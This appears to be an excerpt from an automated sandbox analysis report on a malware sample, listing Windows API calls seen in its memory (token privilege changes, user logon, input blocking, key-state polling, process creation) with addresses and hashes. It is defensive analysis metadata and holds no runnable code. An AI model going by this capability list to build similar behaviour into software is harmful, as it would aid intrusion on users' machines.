                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DialogLongNtdllProc_Window
                                            • String ID:
                                            • API String ID: 2065330234-0
                                            • Opcode ID: 86264796e2389ed28a787a4fd643736de597c5b37cf7cbfb040c638c6af8dc1f
                                            • Instruction ID: b9e5270cafeac4a779a0b68caa516305cf193b1003f5f33e7564ba5c49a0ce43
                                            • Opcode Fuzzy Hash: 86264796e2389ed28a787a4fd643736de597c5b37cf7cbfb040c638c6af8dc1f
                                            • Instruction Fuzzy Hash: A1E08670214259BFEB145F19DC09FBA3B58EB04790F508225FD56D90E1C770A860D760
                                            APIs
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00288851), ref: 00288728
                                            • CloseHandle.KERNEL32(?), ref: 0028873A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AdjustCloseHandlePrivilegesToken
                                            • String ID:
                                            • API String ID: 81990902-0
                                            • Opcode ID: 81e412baf24bd33d43f5db0122a55891f20e82c98242c9c88eb8e268415cdb24
                                            • Instruction ID: 7d815dccdfb25c4e7bbd8e3bc995642acd94ed9f8f62f557cec9480f83094042
                                            • Opcode Fuzzy Hash: 81e412baf24bd33d43f5db0122a55891f20e82c98242c9c88eb8e268415cdb24
                                            • Instruction Fuzzy Hash: F0E08C36020610EFE7212B20FD08E73BBE9EF04361724893DF896804B0CB32ACA0DB10
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0025A39A
                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0025A3A3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 616110689006555f24c9ee572cb51f07bb7975765f238436362345a0229d2307
                                            • Instruction ID: 52dfa1ead0ce8a2ba4add47f854ff4454f1db8417907312aa7918ce25fd4a602
                                            • Opcode Fuzzy Hash: 616110689006555f24c9ee572cb51f07bb7975765f238436362345a0229d2307
                                            • Instruction Fuzzy Hash: 95B09231054248ABCA802B91FD0DB883FA8EB44BA2F4081A0FF0E84060CB6254508A91
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7462aed1eeee556cafe4c614c7e3a00c10919bcd4e207a931f8d16f37a364a9
                                            • Instruction ID: a429bf539c3d9b7361e54c9063a01d0a6408c9b3f19225ede69c00553f1cbf57
                                            • Opcode Fuzzy Hash: b7462aed1eeee556cafe4c614c7e3a00c10919bcd4e207a931f8d16f37a364a9
                                            • Instruction Fuzzy Hash: 6E320221D79F014DD7639A34D936326A248AFB73CAF14D737EC1AB59A6EB38C8834104
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9792dae353153496458624ec0441811887d881414817026f5796e810f37202b
                                            • Instruction ID: 30beca32311b798377e06240bfaebcd1183db45bf94d0baf890fac302dacf9ca
                                            • Opcode Fuzzy Hash: e9792dae353153496458624ec0441811887d881414817026f5796e810f37202b
                                            • Instruction Fuzzy Hash: 72B1F020D2AF454DD32396399839336BA4CAFBB2C9F51D71BFC2671D22EB2185834141
                                            APIs
                                              • Part of subcall function 002325DB: GetWindowLongW.USER32(?,000000EB), ref: 002325EC
                                            • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0026BBA2,?,?,?,?,00000000,?), ref: 002BD740
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DialogLongNtdllProc_Window
                                            • String ID:
                                            • API String ID: 2065330234-0
                                            • Opcode ID: 255699c95e6bb4056755a5101e344f7e81f6083699420fc02401cbdcf915bc19
                                            • Instruction ID: 95805187408bcf5fc873f8292feaadce5001a7c14a4ea8008884fcd82fd9e8c1
                                            • Opcode Fuzzy Hash: 255699c95e6bb4056755a5101e344f7e81f6083699420fc02401cbdcf915bc19
                                            • Instruction Fuzzy Hash: 62012835610015ABDB149F29D889FF9BB92EF413A4F444125F9151B191D730BC71E7A0
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                              • Part of subcall function 00232344: GetCursorPos.USER32(?), ref: 00232357
                                              • Part of subcall function 00232344: ScreenToClient.USER32(002F67B0,?), ref: 00232374
                                              • Part of subcall function 00232344: GetAsyncKeyState.USER32(00000001), ref: 00232399
                                              • Part of subcall function 00232344: GetAsyncKeyState.USER32(00000002), ref: 002323A7
                                            • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0026BC4F,?,?,?,?,?,00000001,?), ref: 002BC272
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                            • String ID:
                                            • API String ID: 2356834413-0
                                            • Opcode ID: ebc32acbc960719ec40baf5e66c4c1f23011ba12cdd871890025dabc26873572
                                            • Instruction ID: 4b6463fa3657d249f740281915ccfa83dee55e5df75aae0b636f1cf9cc25077a
                                            • Opcode Fuzzy Hash: ebc32acbc960719ec40baf5e66c4c1f23011ba12cdd871890025dabc26873572
                                            • Instruction Fuzzy Hash: 77F08270210229EBDF14AF49DC0AEBA3B95EB04790F004065F9465B291CB75AC74DFE0
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00231B04,?,?,?,?,?), ref: 002318E2
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DialogLongNtdllProc_Window
                                            • String ID:
                                            • API String ID: 2065330234-0
                                            • Opcode ID: d57579e64df231fbd345472fd5054a4594f95776caeb42427faa1baaabd045ba
                                            • Instruction ID: ab0d07eff55e551f7297e13605e6516f5b42a03c5db2928b6bb19c1511ec4fc3
                                            • Opcode Fuzzy Hash: d57579e64df231fbd345472fd5054a4594f95776caeb42427faa1baaabd045ba
                                            • Instruction Fuzzy Hash: 2FF05E746102299FEB18EF18E85997677A6EB443A0F504529F9524B3E1CB31E870DB50
                                            APIs
                                            • BlockInput.USER32(00000001), ref: 002A4218
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BlockInput
                                            • String ID:
                                            • API String ID: 3456056419-0
                                            • Opcode ID: 44a6699a622ae9807b00126da083c8457e5e7e015076d9572a467ec40860ff75
                                            • Instruction ID: c48bab4844d19ebbbdc3d7dd3fcf513f7f9490c6eec75914476272bd6faf5fb5
                                            • Opcode Fuzzy Hash: 44a6699a622ae9807b00126da083c8457e5e7e015076d9572a467ec40860ff75
                                            • Instruction Fuzzy Hash: CAE048752601145FC710EF59D844B5AF7ECAF95760F008416FD49C7351DAF0EC548B90
                                            APIs
                                            • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 002BCBEE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DialogNtdllProc_
                                            • String ID:
                                            • API String ID: 3239928679-0
                                            • Opcode ID: bd80fa2a4d39999edd2941801115ad12f29ca88a98ac95fe1e7dee5b751ea84e
                                            • Instruction ID: 711ba144b3a9d7f79b08d86a104cfc3640b76b6cc63f63e95f3482ff04e9e697
                                            • Opcode Fuzzy Hash: bd80fa2a4d39999edd2941801115ad12f29ca88a98ac95fe1e7dee5b751ea84e
                                            • Instruction Fuzzy Hash: BFF09231250259BFDB21EF58EC09FD67B95EB097A0F144058FA21272E1CB707820DBA0
                                            APIs
                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00294F18
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: mouse_event
                                            • String ID:
                                            • API String ID: 2434400541-0
                                            • Opcode ID: cb9fef881712808711de295862378e848627ef44fff8f00c65301906c290f15b
                                            • Instruction ID: d9a844d395b74491678b237d7570b88d690258417ec8f9922c7dd20a60426967
                                            • Opcode Fuzzy Hash: cb9fef881712808711de295862378e848627ef44fff8f00c65301906c290f15b
                                            • Instruction Fuzzy Hash: C2D09EB517860779FC286F20AC1FF761209E354795FD45A89720195CC198E57C72A435
                                            APIs
                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002888D1), ref: 00288CB3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: LogonUser
                                            • String ID:
                                            • API String ID: 1244722697-0
                                            • Opcode ID: 3c5e0ef191c3fe4d529863c90698d77fb8f45ffa76afe75c6f248f2eb2a3bba4
                                            • Instruction ID: 01987a76248543066c9957a923bc0b84cccd5eb2f3178d0866cfb03a743402ad
                                            • Opcode Fuzzy Hash: 3c5e0ef191c3fe4d529863c90698d77fb8f45ffa76afe75c6f248f2eb2a3bba4
                                            • Instruction Fuzzy Hash: 4DD05E3226050EABEF019EA4ED06EAE3B69EB04B01F408511FE15C50A1C775D835AB60
                                            APIs
                                            • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0026BC0C,?,?,?,?,?,?), ref: 002BCC24
                                              • Part of subcall function 002BB8EF: _memset.LIBCMT ref: 002BB8FE
                                              • Part of subcall function 002BB8EF: _memset.LIBCMT ref: 002BB90D
                                              • Part of subcall function 002BB8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002F7F20,002F7F64), ref: 002BB93C
                                              • Part of subcall function 002BB8EF: CloseHandle.KERNEL32 ref: 002BB94E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                            • String ID:
                                            • API String ID: 2364484715-0
                                            • Opcode ID: 3222df275a40b38d9969ad21b5761f2b7c697f51d0b8586a3a4ba1011314f3b6
                                            • Instruction ID: 7298c4ee94e9b5fe46d091198b705ec1b589e5592b2468fb2b7ed3f29248c0f5
                                            • Opcode Fuzzy Hash: 3222df275a40b38d9969ad21b5761f2b7c697f51d0b8586a3a4ba1011314f3b6
                                            • Instruction Fuzzy Hash: 3DE0B635220209DFDB11AF44EE49E953BA5FB2C791F014066FA195B2B2CB71A970EF50
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00231AEE,?,?,?), ref: 002316AB
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DialogLongNtdllProc_Window
                                            • String ID:
                                            • API String ID: 2065330234-0
                                            • Opcode ID: b23b624556752ea1dfd6589767f96628e12b087a7e5278b25cbdcb0a15c0628b
                                            • Instruction ID: d36c5d40a5b93c90ff9797bbbf4ffd3b72a7128b6ed5c188bdb03f41b2808645
                                            • Opcode Fuzzy Hash: b23b624556752ea1dfd6589767f96628e12b087a7e5278b25cbdcb0a15c0628b
                                            • Instruction Fuzzy Hash: AEE0EC75510208FBCF15AF90DC19E647B2AFB48354F108468FA450A2A1CA32B526DF50
                                            APIs
                                            • NtdllDialogWndProc_W.NTDLL ref: 002BCBA4
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DialogNtdllProc_
                                            • String ID:
                                            • API String ID: 3239928679-0
                                            • Opcode ID: 556b23daac6a7a48b00c1904f909ea37455779b1fa9f31fadf0968f686676a57
                                            • Instruction ID: 5a18b4b423eee53509c32ebeb680400b3d1130991685f5bd752638b053b7ac1b
                                            • Opcode Fuzzy Hash: 556b23daac6a7a48b00c1904f909ea37455779b1fa9f31fadf0968f686676a57
                                            • Instruction Fuzzy Hash: 88E0E235200208EFDB01DF88E948D963BA5EB1D340F004064FA0547262CB71A820EBA1
                                            APIs
                                            • NtdllDialogWndProc_W.NTDLL ref: 002BCB75
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: DialogNtdllProc_
                                            • String ID:
                                            • API String ID: 3239928679-0
                                            • Opcode ID: 4847ed7d0b0f2db6637021ff5c4f1ef6910ded6d7032725efd62adb85cecef2c
                                            • Instruction ID: e85dd47a4ccdeac900883d1b1ab2352b1e6af0b86af19af3a230a4972e7566f7
                                            • Opcode Fuzzy Hash: 4847ed7d0b0f2db6637021ff5c4f1ef6910ded6d7032725efd62adb85cecef2c
                                            • Instruction Fuzzy Hash: D1E0E235200208AFDB01DF88EC88E963BA5EB1D340F004064FA0547262CB71A820EB61
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                              • Part of subcall function 0023201B: DestroyWindow.USER32(?), ref: 002320D3
                                              • Part of subcall function 0023201B: KillTimer.USER32(-00000001,?), ref: 0023216E
                                            • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00231AE2,?,?), ref: 002316D4
